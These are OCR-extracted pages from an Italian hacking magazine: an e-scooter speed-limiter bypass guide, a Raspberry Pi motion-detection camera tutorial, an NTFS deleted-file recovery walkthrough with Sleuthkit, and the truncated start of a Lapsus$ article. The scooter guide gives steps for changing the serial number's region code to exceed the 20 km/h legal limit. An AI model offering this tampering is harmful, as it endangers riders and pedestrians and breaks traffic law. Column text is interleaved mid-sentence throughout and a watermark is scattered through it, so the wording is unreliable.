nuova legge tantissimi monopattini della community di Scooterhacking
@

appunto un monopattino
elettrico, che gestisce tutte elettrici hanno già ricevuto un che ci ha mostrato il nuovo metodo
le principali funzionalità aggiornamento OTA del firmware per “truccare” i monopattini elettrici.
del mezzo. e ora i rispettivi proprietari si vedono Durante la lunga chiacchierata, lo
costretti a guidare a una velocità smanettone ci ha fatto vedere come,
KERS

AVVERTENZA!
Acronimo di Kinetic Energy
Recovery System (sistema
di recupero dell’energia
cinetica). Si tratta di un Questa guida viene proposta solo a scopo informativo. Intervenire sul
dispositivo elettromeccanico monopattino per modificare alcuni parametri può invalidare la garanzia.
atto a recuperare Inoltre, chi utilizzerà un e-scooter non conforme rischia multe pesanti
parzialmente l’energia oltre alla confisca del mezzo. Quando si circola su suolo pubblico con
cinetica di un veicolo durante il monopattino elettrico, ricordate sempre di rispettare la normativa vigente
la fase di frenata e di che trovate sul sito https://bit.ly/hj263_norme.
trasformarla in energia
nuovamente riutilizzabile.

44
 SERIAL HACKING
installando una particolare app il monopattino a un’altra zona in Europa, a causa delle stringenti
sul proprio smartphone Android, geografica. È proprio a quella normative, il limite associato è 20
riesce a modificare la prima parte sezione del codice seriale che è km/h. Per quelli venduti in altri
del codice seriale (leggi box per associato il limite di velocità del mercati (Asia, per esempio) i limiti
approfondimento), attribuendo monopattino. Per i modelli venduti di velocità sono più elevati.

Secondo le nuove regole

SALVA IL CODICE
i monopattini elettrici non
SERIALE!
Durante il suo racconto, il pirata ci svela alcune chicche,
possono superare il limite di
come quella di ricopiare e conservare il codice seriale velocità di 6 km/h nelle aree

s
originale del monopattino in modo da avere la possibilità,
in futuro, di annullare la modifica e riportare il mezzo pedonali e di 20 km/h in tutti
allo stato originale di fabbrica. È importante non perderlo,
gli altri casi di circolazione

ew
ci spiega. Il suo racconto continua mostrandoci tre modi
per reperire il codice seriale del veicolo:
- in un'etichetta sotto al monopattino;
- nella confezione d’acquisto, stampato sul lato; L'app usata dallo
- aprendo l’app Segway o Mi Home e controllando
la sezione Informazioni.
smanettone
#1
_n
LA SCARICA DAL PLAY
STORE. L’applicazione
che permette di sbloccare
il monopattino è stata
sviluppata e pubblicata
lia

dalla community di
Scooterhacking. L’hacker
avvia il Play Store sul
proprio smartphone
Android e cerca l’app
Scooterhacking Utility
ita

per scaricarla e installarla

sul proprio dispositivo.
CHE COS’È IL CODICE
SERIALE DEL
#2
@

MONOPATTINO
PRIMA DI PROCEDERE…
Il codice seriale, chiamato anche Serial Code, Serial
Il pirata accende il
Number o più semplicemente SN, è la “carta d’identità
monopattino elettrico
del monopattino”. È l’equivalente del numero di telaio
e ci spiega che la batteria
dell’automobile. I Serial Number dei monopattini Xiaomi
del veicolo deve essere
e Ninebot si compongono di due parti essenziali:
completamente carica,
- la prima parte identifica la zona per la quale
il monopattino è stato messo in commercio o almeno avere un livello
(Europa, Stati Uniti, Asia); di carica residua superiore
- la seconda parte è un numero identificativo unico al 90%, prima di procedere
del tuo scooter elettrico. con la modifica. A questo
punto si collega al veicolo
attivando la connessione
Bluetooth sul proprio
smartphone.

45
HOW TO

COSÌ AGGIORNA IL FIRMWARE

#1 #2
SMARTPHONE IN MANO CONNESSIONE AL
E… Prima di iniziare, MONOPATTINO.
lo smanettone riavvia il Per procedere effettua
cellulare per essere sicuro un tap in corrispondenza
che altre applicazioni del modello del suo
aperte in background non monopattino. Un attimo

s
generino conflitti. Attiva dopo si trova davanti a una
il Bluetooth e avvia l’app schermata che mostra tutte
Scooterhacking Utility: le informazioni principali

ew
si troverà davanti a una del veicolo. Nel caso
schermata che mostra in cui la connessione non
i dispositivi disponibili. andasse a buon fine al
primo tentativo, il pirata
suggerisce di spegnere e
riaccendere il monopattino.
_n
#3 #4
LA SCELTA DELLE OPZIONI. LIMITI BYPASSATI.
Il pirata scorre la Lo smanettone ci mostra
schermata fino a cercare la un ricco menu con una lista
sezione Tools dalla quale di opzioni. Ci spiega che
lia

interviene per modificare, siamo arrivati al punto

tra le altre cose, il KERS cruciale della modifica.
(indica la potenza del freno Dal menu sceglie l’opzione
motore rigenerativo) o con la velocità massima
attivare/disattivare il Walk più elevata (E45 30kmh)
ita

mode. Infine preme il come si evince dallo

pulsante Change region screenshot.
di colore blu al centro
dello schermo.
@

#5 UN AVVERTIMENTO
ULTIME ACCORTEZZE.
La modifica è stata
FONDAMENTALE
4 LIMITI BYPASSATI. Lo
smanettone ci mostra un
completata. Prima Durante l’aggiornamento
ricco menu con una listadeldi
di provare il veicolo, firmware,
opzioni.il Ci
pirata
spiegaci racconta
che che
lo smanettone spegne vi sono
siamoalcune opzioni
arrivati al puntomesse a
e riaccende il monopattino. cruciale della
disposizione modifica.
dall’app Dal
(in particolare:
Al termine ci mostra menu sceglie l’opzione
German maneuver, European con
orgoglioso i miglioramenti la velocità
maneuver massima riservate
e Unbind) più
delle performance elevata (E45 30 km/h)
per modifiche avanzate (di come
tipo
ottenute: più si evince dallo screenshot.
hardware). Scegliendo queste
accelerazione, velocità
opzioni senza essere esperti si
massima fino a 36 km/h
(anziché 20 km/h).
rischia di danneggiare il veicolo.

46
 SERIAL HACKING

MODIFICA AL MONOPATTINO ELETTRICO:

COSA C’È DA SAPERE
Al termine dell’intervista abbiamo chiesto allo smanettone di fugare alcuni nostri
dubbi sull’operazione di modifica dei monopattini.
Ecco cosa ci ha risposto.

s
Domanda> La modifica si può annullare?
Risposta> Sì, in ogni momento si può tornare allo stato iniziale del proprio microveicolo e non sarà tenuta
traccia della modifica. Per farlo occorre reinserire il Serial Number originale come fatto al passo 3 del box

ew
“Così aggiorna il firmware”, dopo aver scelto Load Custom dal menu.

D> Il procedimento di sblocco può danneggiare il monopattino?

R> No, il procedimento è testato e sicuro. In più non va ad alterare alcun parametro “vitale” del monopattino
come la potenza del motore o la tensione della batteria. Si tratta solo della rimozione del limitatore
software di velocità.
_n
D> Dopo la modifica si può continuare a controllare l’e-scooter dall’applicazione ufficiale Mi Home / Segway?
R> Sì, si può continuare a controllare il monopattino dall’app del produttore. Si può fare anche se si dispone
di un iPhone: ovviamente la modifica va effettuata con un telefono Android. Occorre solo riassociare
il monopattino all’app che si usava in precedenza.
lia

D> Se non si nota alcun miglioramento di performance dopo la modifica, che cosa si può fare?
R> Probabilmente il monopattino è impostato in modalità Risparmio Energetico. Con questo stile di guida
attivo, le alterazioni del limitatore di velocità non hanno effetto. Occorre premere due volte in rapida
successione il tasto centrale di accensione per inserire la modalità Sport.
ita

FOCUS SULLE NUOVE

NORME DEI
@

MONOPATTINI
ELETTRICI
Alla fine dello scorso anno i monopattini elettrici sono stati
sottoposti a tutta una serie di nuove norme. Dal prossimo
1 luglio 2022 potranno essere commercializzati solo
monopattini dotati di frecce direzionali e luci di stop.
Se il vostro monopattino non ha le frecce direzionali avete
tempo fino al 1 gennaio 2024 per adeguarlo. Come fare?
Dovrete acquistare un kit di indicatori di direzione per
monopattino. Questi kit, però, sono ancora rari e difficili
da trovare in commercio. Inoltre, è stato reso obbligatorio
l’uso del casco in monopattino elettrico per i minorenni
ed è stata abbassata da 25 a 20 km/h la velocità massima
consentita su strade pubbliche.

47
HOW TO

Registrate video con

la motion detection
s
ew
Un sistema di videosorveglianza ideale per la sicurezza ma anche
per riprendere automaticamente i vostri animali o la fauna locale

U
IN BREVE sare una Raspberry Pi in commercio. Dovete anche
con una videocamera per alimentare il vostro sistema. In questo
_n
Usiamo la piccola
Raspberry Pi per
creare un sistema di ripresa articolo è stato usato un HAT PiJuice,
sorvegliare di attivato dalla rilevazione del che si può collegare a una batteria
nascosto la casa, movimento è un processo piuttosto USB esterna o a un pannello solare.
l’ufficio, il giardino semplice e dai molti usi. Oltre alla Anche per il software ci sono diverse
o l’auto. sicurezza, un’applicazione è filmare opzioni, in questo caso suggeriamo
lia

DIFFICOLTÀ l’attività dei vostri animali domestici l’uso di Motion (https://motion-

o, se siete così fortunati da avere un project.github.io/index.html).
giardino, degli animali che possono Dovete collegare la RP alla rete
capitarci, come la fauna avicola locale. wireless di casa vostra e permetterle
Se tenete la Pi all’aperto vi servirà un di trasmettere in streaming attraverso
ita

case impermeabile, ce ne sono molti un browser. Come impostazione

predefinita lo stream è di bassa
qualità (un’immagine JPEG al secondo,
per risparmiare la batteria). Quando
viene rilevato un movimento (ossia
@

quando nell’immagine cambia un

certo numero di pixel) si avvia la
videocamera che registra fino
al termine del movimento, salvando
un file video di qualità superiore.

ctrl_interface=DIR=/var/run/
wpa_supplicant
GROUP=netdev
update_config=1
Se usate il vostro sistema di sorveglianza all’aperto country=IT
è importante proteggerlo dagli elementi con una network={
copertura impermeabile. ssid=“Nome vostra rete/

48
 VIDEOSORVEGLIANZA
Aggiornate la vostra Pi con
Come un film
$ sudo apt update in bianco
$ sudo apt upgrade e nero
Se usate una scheda HAT per
l’alimentazione, impostatela ora.
S e utilizzate, come nel
nostro test, l’edizione
NoIR della Pi Camera,
PiJuice offre un comodo script noterete che le immagini
Python che mostra il livello e lo risultano strane e rosate.
stato del caricamento, oltre Potete rimediare

s
a fornire il lusso di un pulsante aggiungendo quanto segue:
di accensione che vi permette
di spegnere la Pi senza problemi

ew
mmalcam_name vc.ril.
se perdete la connettività di rete. camera
Dovete anche attivare la mmalcam_control_params
videocamera con il comando -awb greyworld

$ sudo raspi-config al vostro file /etc/motion/

Per questo progetto vi servono motion.conf. Otterrete così
_n
una RP (dalla 3 in su),
e visitare il menu Interfacing delle tradizionali immagini
la Pi Camera e una fonte
di alimentazione. Options. Controllate che tutto monocromatiche.
funzioni con La videocamera NoIR
SSID” non è ideale per le riprese
psk=“Vostra chiave raspistill -o test.jpg diurne, anche se potete
lia

WPA/WPA2” usarla (aggiungendo il filtro

key_mgmt=WPA-PSK Se la lucina rossa della blu incluso) per valutare la
} videocamera si attiva ma vedete salute delle piante usando gli
un messaggio di errore, potreste infragrammi. Potete inoltre
Salvate il file, smontate la scheda avere dei problemi di connessione fare riprese notturne. La luce
ita

SD, inseritela nella Pi e avviate. (o il dispositivo è rotto). a infrarossi non disturba gli
Se il vostro sistema operativo Spegnetela, resettate la animali ed è invisibile per gli
supporta la ricerca dei nomi .local connessione e riprovate. uomini, quindi se aggiungete
e non ci sono altre Pi nella vostra Nei repository c’è una versione una lampada a infrarossi alla
rete, potete collegarvi via SSH vecchia di Motion, ma è facile vostra installazione potete
@

alla Pi aprendo un terminale ottenere quella nuova da GitHub riprendere uccelli o altri
ed eseguendo (supporta anche più hardware). animali selvatici che possono
Andate alla pagina del progetto e, entrare in giardino se siete
$ ssh pi@raspberrypi.local se nel frattempo dovesse essere in campagna.
uscita una versione successiva
Altrimenti potete usare Nmap, il alla 4.3.2, cambiate il numero
vostro router o, se proprio dovete, nel comando qui sotto.
monitor e tastiera per trovare Scaricate il deb con
la vostra Pi tramite l’indirizzo IP
e poi usarlo dopo il simbolo @ Il Wi-Fi consuma energia, quindi se
nel comando citato. In ogni caso,
fate il login con la password
non vi serve lo streaming in tempo
predefinita raspberry. reale potete disattivarlo

49
HOW TO
$ wget https://github.com/ target_dir /var/lib/motion I nomi dei file sono basati
Motion-Project/motion/ stream_localhost off sulla data e potete navigarci
releases/download/ graficamente premendo Ctrl + L
release-4.3.2/pi_buster_ In questo modo salvate i dati nel vostro file manager
motion_4.3.1-2_armhf.deb di Motion nella sua cartella e inserendo
e potete connettervi da un altro
Potete installare le dipendenze dispositivo sulla vostra LAN. sftp://pi:raspberry@
a mano, ma sono varie ed è più Avviate Motion con raspberrypi.local/var/lib/
pratico usare Gdebi: motion
$ sudo systemctl start motion

s
$ sudo apt install gdebi-core Anche in questo caso usate
$ sudo gdebi pi_buster_ e verificate che tutto funzioni l’indirizzo IP se non avete
visitando l’indirizzo http:// la ricerca dei nomi .local.

ew
motion_4.3.1-1_armhf.deb
raspberrypi.local:8081 (o usate Premete F5 ogni tanto per fare
Attivate il demone di Motion l’indirizzo IP della vostra Pi). il refresh, copiate i nuovi file nella
modificando /etc/default/ Se avete modificato il parametro vostra cartella Home e guardate
motion, sostituendo yes a no. rotation nel file di configurazione le attività registrate.
Il programma offre numerose potreste dover riavviare il servizio Se la vostra Pi è abbastanza
opzioni (che trovate all’indirizzo se lo stream è capovolto. potente e volete ottenere video
_n
https://motion-project.github.io/ Le impostazioni di rilevazione di qualità superiore, modificate
motion_config.html), ma basta del movimento predefinite i parametri framerate e movie_
configurarne solo alcune per sono ottime. Provate a muovervi quality.
cominciare. Modificate il file davanti alla videocamera
/etc/motion/motion.conf e troverete un file .mkv salvato L’HAT PiJuice è facile da
lia

e impostate le opzioni nella cartella /var/lib/motion. configurare e ha un’utility che

monitora la carica.
ita
@

50
 ABBONATI
ALLA TUA RIVISTA PREFERITA
TE LA SPEDIAMO APPENA STAMPATA!

CONSEGNA GARANTITA ENTRO 48H

s
ew
_n
lia

Con l’abbonamento
ita

cartaceo la versione
digitale è in OMAGGIO!

Riceverai 12 numeri a soli

DISPONIBILE ANCHE SOLO
@

IN VERSIONE DIGITALE

-28% -57%
CARTACEO DIGITALE
12 numeri 12 numeri
solo 33,90€ solo 19,90€
invece di 46,80€ invece di 46,80€

Scansiona il QrCode per abbonarti oppure contattaci

Telefono online email WhatsApp
02 87168197 www.sprea.it/hackerjournal abbonamenti@sprea.it 329 3922420
Solo messaggi
Informativa ex Art.13 LGS 196/2003. I suoi dati saranno trattati da Sprea SpA, nonché dalle società con essa in rapporto di controllo e collegamento ai sensi dell’art. 2359 c.c. titolari del trattamento, per dare corso alla sua richiesta di abbonamento. A tale scopo, è indispensabile il conferimento dei dati anagrafici. Inoltre
previo suo consenso i suoi dati potranno essere trattati dalle Titolari per le seguenti finalità: 1) Finalità di indagini di mercato e analisi di tipo statistico anche al fine di migliorare la qualità dei servizi erogati, marketing, attività promozionali, offerte commerciali anche nell’interesse di terzi. 2) Finalità connesse alla comunica-
zione dei suoi dati personali a soggetti operanti nei settori editoriale, largo consumo e distribuzione, vendita a distanza, arredamento, telecomunicazioni, farmaceutico, finanziario, assicurativo, automobilistico e ad enti pubblici ed Onlus, per propri utilizzi aventi le medesime finalità di cui al suddetto punto 1) e 2). Per tutte
le finalità menzionate è necessario il suo esplicito consenso. Responsabile del trattamento è Sprea SpA via Torino 51 20063 Cernusco SN (MI). I suoi dati saranno resi disponibili alle seguenti categorie di incaricati che li tratteranno per i suddetti fini: addetti al customer service, addetti alle attività di marketing, addetti al
confezionamento. L’elenco aggiornato delle società del gruppo Sprea SpA, delle altre aziende a cui saranno comunicati i suoi dati e dei responsabili potrà in qualsiasi momento essere richiesto al numero +39 0287168197 “Customer Service”. Lei può in ogni momento e gratuitamente esercitare i diritti previsti dall’articolo 7
del D.Lgs.196/03 – e cioè conoscere quali dei suoi dati vengono trattati, farli integrare, modificare o cancellare per violazione di legge, o opporsi al loro trattamento – scrivendo a Sprea SpA via Torino 51 20063 Cernusco SN (MI).
 HOW TO

Alla scoperta di NTFS!

QUARTA P
A RT E

Chi ha detto che un file cancellato lo è “per sempre”?

C
hi di voi non ha mai cancellato di base, nonché quelle necessarie per
IN BREVE
per sbaglio un proprio file? l’esecuzione del bootstrap (ovvero
Studiamo a fondo

s
Quanti hanno consultato il caricamento del sistema operativo)
le caratteristiche
di uno dei filesystem
con angoscia il Cestino, nella e per l’accesso a tutte le strutture usate
speranza di non aver commesso un per la gestione del filesystem;

ew
più diffusi.
DIFFICOLTÀ
errore irreparabile, che rendesse • la Master File Table (MFT),
definitivamente indisponibili dei dati la struttura “cardine” di NTFS
preziosi? Per coloro che dovessero paragonabile a un’enorme tabella che
essere stati presi dallo sconforto, associa a ogni file un elemento (detto
dando per persi i file eliminati dal MFT entry o file record) contenente
Cestino, abbiamo due notizie, una tutte le relative informazioni (tra cui
_n
buona e una cattiva. Iniziamo dalla directory di appartenenza, dimensione,
cattiva: ci dispiace, ma la vostra flag, nonché il relativo contenuto
angoscia è (stata) mal riposta. Ed ecco o quanto meno l’indirizzo dei cluster
la buona: entro certi limiti (di spazio ove tale contenuto è memorizzato);
e di tempo), anche i file eliminati dal • l’area dati, in cui sono ospitati
lia

Cestino possono essere recuperati. concretamente i contenuti dei file.

NON SOLO PER NTFS COSA USERETE

Si tratta di un discorso generale, che Per l’esame di NTFS abbiamo fatto
riguarda una pluralità di filesystem, affidamento a diversi tool, ciascuno
ita

compreso NTFS, usato da Windows. con i propri punti di forza e le proprie

Prima di addentrarci nei dettagli del peculiarità (li trovate riassunti nel box
recupero dei file cancellati, è bene NTFS & Tool), sino a soffermarci su
ricordare la struttura di questo The Sleuthkit (TSK), una suite cross
filesystem, che suddivide ogni platform per l’analisi forense dei
@

partizione in tre macroaree [figura #1]: filesystem. Si tratta di un software

• boot sector (coincidente con l’area libero scaricabile gratuitamente dal sito
iniziale del disco/partizione), al cui www.sleuthkit.org: una volta
interno sono conservate le informazioni completato il download dei binari per
figura #1 Windows, è sufficiente decomprimere il
pacchetto di installazione per accedere
a tutti i tool della suite, raggruppati
(come da consuetudine in ambiente
La struttura del filesystem NTFS. UNIX) nella sottodirectory bin.

Cancellando un file in NTFS lo spazio IMMAGINE DEL DISCO

Oltre ai tool specialistici abbiamo
che occupava viene indicato come
bisogno anche di un filesystem
libero... ma i dati ci sono ancora da analizzare: a tale scopo, nelle

52
 FILESYSTEM
figura #2
NTFS & Tool
Vista l’ampia diffusione di NTFS
non sorprende la larga diffusione
di tool ad hoc per l’analisi
approfondita di questo
filesystem. Tra questi, nelle
puntate precedenti abbiamo
avuto la possibilità
di confrontarci con:
• NTFStool, utilizzato per l’esame

s
in tempo reale – direttamente
dal prompt dei comandi
– dei contenuti dei file record

ew
di partizioni NTFS;
• Kape, che consente l’estrazione
della MFT di dischi formattati
L’homepage di OSFMount, il tool che usiamo per montare con NTFS, al fine di consentirne
l’immagine della nostra chiavetta “vittima”. la successiva analisi a cura dei
cosiddetti tool “post mortem”;
precedenti puntate, abbiamo come se si trattasse di un disco • MFTexplorer che consente
_n
l’esame in formato grafico della
provveduto a estrarre l’immagine fisico vero e proprio. Perché MFT (a patto che questa sia stata
di una chiavetta USB di appena 1 ciò sia possibile in ambiente precedentemente estratta
GB (che abbiamo salvato, con poca Windows abbiamo bisogno dal disco), fornendo all’utente
fantasia, nel file chiavetta.dd), di un software ad hoc: qualcosa con un’apposita GUI in grado
di semplificare notevolmente
formattata proprio con NTFS. come OSFMount, un tool
lia

l’attività di analisi.
Se vogliamo lavorare con gli sviluppato da PassMark Software
strumenti offerti da Sleuthkit per il e liberamente scaricabile all’URL
recovery dei file cancellati, tuttavia, http://www.osforensics.com/tools/ only drive [figura #4]. In questo
l’immagine non fa più per noi: mount-disk-image.html [figura #2]. modo renderemo possibili le
nessuno dei file ivi contenuti (sono Si tratta di uno strumento tanto modifiche al filesystem contenuto
ita

tre, denominati filesystem.txt, potente quanto semplice da nell’immagine, e di conseguenza

hj.txt e dd.txt) ha infatti subito installare: una volta terminato sarà possibile effettuare
alcuna cancellazione. il download, è sufficiente avviare le cancellazioni desiderate.
Non ci rimane che procedere l’installer, avendo cura di Possiamo quindi confermare
all’estrazione di un’altra confermare tutte le opzioni di le nostre scelte premendo
@

immagine… oppure, se proprio default proposte dal programma. il pulsante Mount: OSFMount
non ci piace l’idea di ripetere mostrerà l’immagine nella
due volte le medesime operazioni, COME UN’UNITÀ FISICA sua schermata principale,
possiamo provare ad accedere Al termine dell’installazione, confermandoci di averla
direttamente all’immagine abbiamo a disposizione montata [figura #5].
e cancellare uno o più file, senza la schermata principale Non solo: il software segnalerà
passare per la chiavetta originaria. del programma, intuitiva le caratteristiche salienti
ed essenziale: è sufficiente dell’immagine (il percorso
MONTIAMO L’IMMAGINE cliccare il pulsante Mount new, del relativo file, la dimensione,
Insomma, qualcosa simile selezionare il file chiavetta.dd le modalità d’accesso) e, non
a quanto accade nei sistemi [figura #3], quindi premere ultimo, il drive (E:\, nel nostro caso)
GNU/Linux, in cui è possibile il pulsante Next sino a giungere che le è stato assegnato da
“montare” un’immagine sul al quarto step, in cui dobbiamo Windows, al pari di una vera
sistema e operarvi direttamente deselezionare la checkbox Read- e propria chiavetta.

53
HOW TO
figura #3 figura #4 box), quindi spostarci nella
directory che ospita i binari
di Sleuthkit, mediante il comando
cd (nel nostro caso, essendo
la directory di Sleuthkit salvata
direttamente sul desktop,
è sufficiente il comando
cd sleuthkit/bin).

PRIMO ESAME
Siamo pronti: iniziamo

s
La selezione dell’immagine Per poter cancellare i file a esaminare i file memorizzati
da montare. dall’immagine è necessario nell’immagine, utilizzando
deselezionare l’opzione il comando fls. La sintassi da usare

ew
CANCELLIAMO I FILE “Read-only drive”. è piuttosto semplice:
L’immagine può essere consultata
e modificata come se fosse un prima spostare il file chiavetta.dd $ ./fls chiavetta.dd
dispositivo fisico: è sufficiente all’interno della sottodirectory bin
navigare attraverso la GUI per della suite [figura #8], in modo e restituisce proprio l’elenco
accedere ai suoi contenuti [figura da potervi operare senza necessità desiderato [figura #9]. Come
_n
#6], rendendo la cancellazione dei di indicare il percorso completo. abbiamo appreso nell’ultima
file un’operazione del tutto banale. Non ci resta che avviare Cygwin puntata, infatti, il tool è in grado
Selezioniamo i file dd.txt e cliccando sulla relativa icona (chi di interrogare la MFT in maniera
filesystem.txt, quindi eliminiamoli avesse bisogno di un’installazione del tutto trasparente all’utente,
definitivamente, avendo cura di da zero può consultare l’omonimo scandendone tutti i file record
lia

tenere premuto il pulsante Shift

unitamente al tasto Canc. figura #5
In questo modo Windows
ci mostrerà una finestra di dialogo
caratterizzata da un testo
ita

inequivocabile: Rimuovere
in modo definitivo il file? [figura
#7]. Confermiamo con Sì, quindi
torniamo alla schermata di
OSFMount, selezioniamo la riga
@

relativa all’immagine su cui

abbiamo appena operato
e premiamo il pulsante Dismount L’immagine montata...
per smontarla, sottraendola
all’accesso da parte del sistema
operativo.
figura #6
AVVIAMO SLEUTHKIT
A questo punto è finalmente
giunto il momento di “mettere le
mani” sull’immagine, impiegando
i tool offerti da The Sleuthkit: per
comodità, tuttavia, è opportuno ...è accessibile tramite file manager.

54
 FILESYSTEM
figura #7
Cygwin
Linux dentro
Windows
Cygwin è una suite di tool
in grado di fornire – in ambiente
Windows – funzionalità
comparabili a quelle
di una qualsiasi distribuzione
GNU/Linux. È liberamente

s
scaricabile dal sito Web
del progetto (https://www. Rimuoviamo definitivamente il file.
cygwin.com/index.html)

ew
e l’installazione non richiede
dall’immagine. In effetti, il tool dei due file. Grazie all’output di fls
particolari accortezze:
è sufficiente accettare le scelte di ci “avvisa” del fatto che si tratta conosciamo l’indice di entrambe
default proposte dall’interfaccia di file cancellati, in quanto le entry, pari rispettivamente
di installazione, a eccezione entrambi sono contrassegnati a 64 e 73: non ci resta che far
di quelle per la selezione della
con un asterisco (che invece ricorso nuovamente al tool
tipologia di connessione (nella
non è presente nelle restanti voci, istat, che abbiamo già visto
_n
stragrande maggioranza dei casi
è sufficiente optare per “direct relative per l’appunto a file all’opera nella puntata precedente,
connection”) e del mirror da concretamente presenti per confrontarne i relativi
utilizzare per il download. Una nel filesystem). contenuti. Per invocare istat sul file
volta completata l’installazione,
cancellato (dd.txt), dobbiamo
basta avviare Cygwin cliccando
sulla relativa icona presente SCAVIAMO PIÙ A FONDO utilizzare la sintassi
lia

sul desktop per accedere In base a quale criterio fls è in

a un vero e proprio terminale grado di distinguere tra un file $ ./istat chiavetta.dd 64
GNU/Linux implementato
cancellato e uno tuttora presente
in ambiente Windows!
nel filesystem? Perché che, come si vede in [figura #10],
– correttamente – il file dd.txt restituisce un risultato tutt’altro
ita

al fine di stampare a video è contrassegnato dall’output che anomalo, comprensivo di tutti

– per tutti i record che siano stati del tool e il file hj.txt non lo è? gli elementi presenti in un output
utilizzati almeno una volta Per rispondere a questa domanda “ordinario”. Ne possiamo avere
– il nome del file a cui l’entry dobbiamo scavare più a fondo, la riprova reiterando l’esecuzione
fa riferimento e il relativo indice dando un’occhiata alla MFT entry di istat per il file hj.txt, tuttora
@

figura #8
numerico all’interno della tabella.
Quando diciamo “per tutti i record
che siano stati utilizzati almeno
una volta” non intendiamo, quindi,
solo le entry tuttora utilizzate,
ma anche quelle relative a file
cancellati: non a caso, osservando
con attenzione l’output del
comando in questo esempio
specifico possiamo notare come
nell’elenco siano inclusi anche
i file dd.txt e filesystem.txt,
che abbiamo appena rimosso Per comodità, salviamo l’immagine nella
directory bin di Sleuthkit.

55
HOW TO

Master File Table

Gran parte del design di NTFS può essere sintetizzato con due concetti: la Master File Table e l’assunto che “ogni
oggetto è un file”. Che si tratti del boot sector, della root directory o dei metadati deputati alla gestione del filesystem
(compresa la stessa Master File Table), tutto viene rappresentato da NTFS sotto forma di file. Possiamo pensare
alla MFT come una gigantesca tabella, che associa a ciascun file presente nel filesystem un elemento detto MFT entry
o file record. Ogni file record è identificato univocamente da un apposito indice, che ne specifica la posizione
all’interno della tabella:
• il primo file record ha indice pari a 0, e contiene gli attributi relativi al file $MFT, che identifica la MFT stessa;
• il secondo (indice 1) fa riferimento al file $MFTMirr, ovvero la copia della MFT;
• il sesto (indice 5) rappresenta la root directory del filesystem (.), l’ottavo il boot record ($Boot), mentre gli elementi

s
dall’indice 27 in poi sono generalmente associati a file ordinari;
e ha una struttura composta da due grandi aree:
• un header iniziale contenente informazioni di carattere generale, come la dimensione effettiva e allocata su disco

ew
o il numero di sequenza (che indica il numero di riutilizzi del file record, incrementandosi ogni volta che il file associato
viene cancellato e ricreato);
• una lista di attributi, il cui contenuto varia da attributo ad attributo.
Sono proprio gli attributi a definire il file: in NTFS, infatti, un file non è altro che un insieme di attributi. Tra questi,
è opportuno segnalare:
• $DATA, l’attributo – generalmente non residente, ovvero esterno al file record, che si limita a conservare l’indirizzo
dei cluster ove l’attributo è effettivamente memorizzato – a cui è affidato il compito di conservare il contenuto del file;
• $STANDARD_INFORMATION, l’attributo (residente, ovvero interno al file record) che memorizza le informazioni
_n
temporali (come tempi di creazione, modifica e accesso) e i flag (quelli relativi, per esempio, ai file di sistema, read only,
nascosti o compressi) di ciascun file e directory del volume;
• $FILE_NAME (anch’esso residente), che viene utilizzato per la memorizzazione di nome e dimensione dei file
(quest’ultima distinta in dimensione reale e dimensione allocata) e per i riferimenti alla directory di appartenenza.
lia

presente nel filesystem: otteniamo un risultato del tutto Tra le poche differenze
eseguendo il comando sovrapponibile – a eccezione apprezzabili, l’unica che ci faccia
dei dati veri e propri – con quello notare immediatamente la
$ ./istat chiavetta.dd 73 precedente [figura #11]. distinzione tra i due file è quella
relativa allo stato delle due MFT
ita

entry, che per dd.txt figura come

Not Allocated File e per hj.txt,
invece, Allocated File.

CANCELLATI O NO?
@

Insomma: abbiamo eliminato

i due file usando quella che
Windows stesso ha definito come
“rimozione definitiva”, eppure
riusciamo ad accedere ai relativi
file record tramite i tool di
Sleuthkit. La cancellazione
(che, ripetiamo, Windows ci ha
presentato come irreversibile)
ha cioè reso i file indisponibili
esclusivamente attraverso

L’output di fls ci mostra i due file cancellati.

figura #9 l’interfaccia del sistema operativo,
senza tuttavia provvedere a una

56
 FILESYSTEM
figura #10 che ci restituisce la pagina del
manuale di dd, proprio come
se il file fosse tuttora presente nel
filesystem. In altri termini, quella
eseguita dal sistema operativo
è una mera cancellazione logica: il
file viene marcato come cancellato
(ovvero in NTFS lo stato della
relativa MFT entry passa da
“allocato” a “non allocato”), ma

s
nessuna operazione aggiuntiva
viene effettuata sul disco al fine
di renderne inaccessibili i relativi

ew
contenuti. In questo modo si
guadagna tempo ed efficienza,
rendendo la cancellazione di un
file un’operazione veloce e con un
impatto minimo sul disco: spetta
poi allo stesso sistema operativo
_n
L’output di istat per il file cancellato. impedire l’effettivo accesso al file,
rendendo indisponibile agli utenti
rimozione effettiva dei metadati indice è 64, quindi per il file dd.txt i relativi contenuti attraverso
contenuti nella MFT. A questo dobbiamo digitare il comando l’interfaccia di sistema.
punto non ci rimane che Un’interfaccia che, per l’appunto
lia

rispondere a una domanda per $ ./icat chiavetta.dd 64 Sleuthkit ci consente di aggirare…

chiudere il cerchio: vale lo stesso
anche per il contenuto di ciascun figura #11
file? Sin dalle prime puntate di
questa serie abbiamo appreso
ita

come in NTFS un file non sia altro

che un insieme di attributi,
e il contenuto non faccia
eccezione: ma allora, visto che la
directory entry di un file cancellato
@

conserva praticamente tutti

i restanti attributi, è logico
attendersi che lo stesso valga
anche per il contenuto!

STAMPIAMO IL CONTENUTO
Non è difficile soddisfare la nostra
curiosità: come abbiamo imparato,
possiamo stampare a video i
contenuti di un file mediante il tool
icat, fornendo in argomento al
comando l’indice della relativa MFT
entry. Nel nostro caso questo L’output di istat per il file non cancellato.

57
 HACKULTURE

s
Lap sus$ ha m es so ew
_n
nel sacc o le Big Te ch
lia

nasc onde un gr uppo di hacker giovanissimi

Sotto questo nick si
in pied i op erazioni m olto sofisticate contro
che ha messo ia
i colossi della tecnolog
ita

È
almeno dal dicembre minorenni che ha brillato Salute del Brasile e ha portato via
scorso che i dati di alcune moltissimo per alcuni mesi e poi è 50 Terabyte di dati interni (copiati
@

delle più importanti società stata completamente smantellata. e poi cancellati dai sistemi).
del settore tech vengono In particolare, nel Regno Unito è Poi, un altro attacco in Portogallo,
portati via dai server dei legittimi stato arrestato un gruppo di sette a un’altra società (nel settore
proprietari e condivisi in Rete: ragazzi tra i 16 e i 21 anni. audiovisivo) e ancora una serie
codice sorgente, certificati, La storia dei loro attacchi è una di azioni che sono state un
documenti riservati. E parliamo vera e propria escalation rovinata crescendo, facendo pensare
di Microsoft, forse EA Sports, ma dalle eccessive ambizioni del suo che i novellini che si agitavano
anche Samsung, Nvidia, Ubisoft, capo e dalle gelosie interne. e facevano rumore fossero
Okta. I trofei appesi al caminetto dei talentuosi dal punto di vista tecnico
cybercriminali capaci di così tanto GLI INIZI IN BRASILE ma ancora inesperti dal punto di
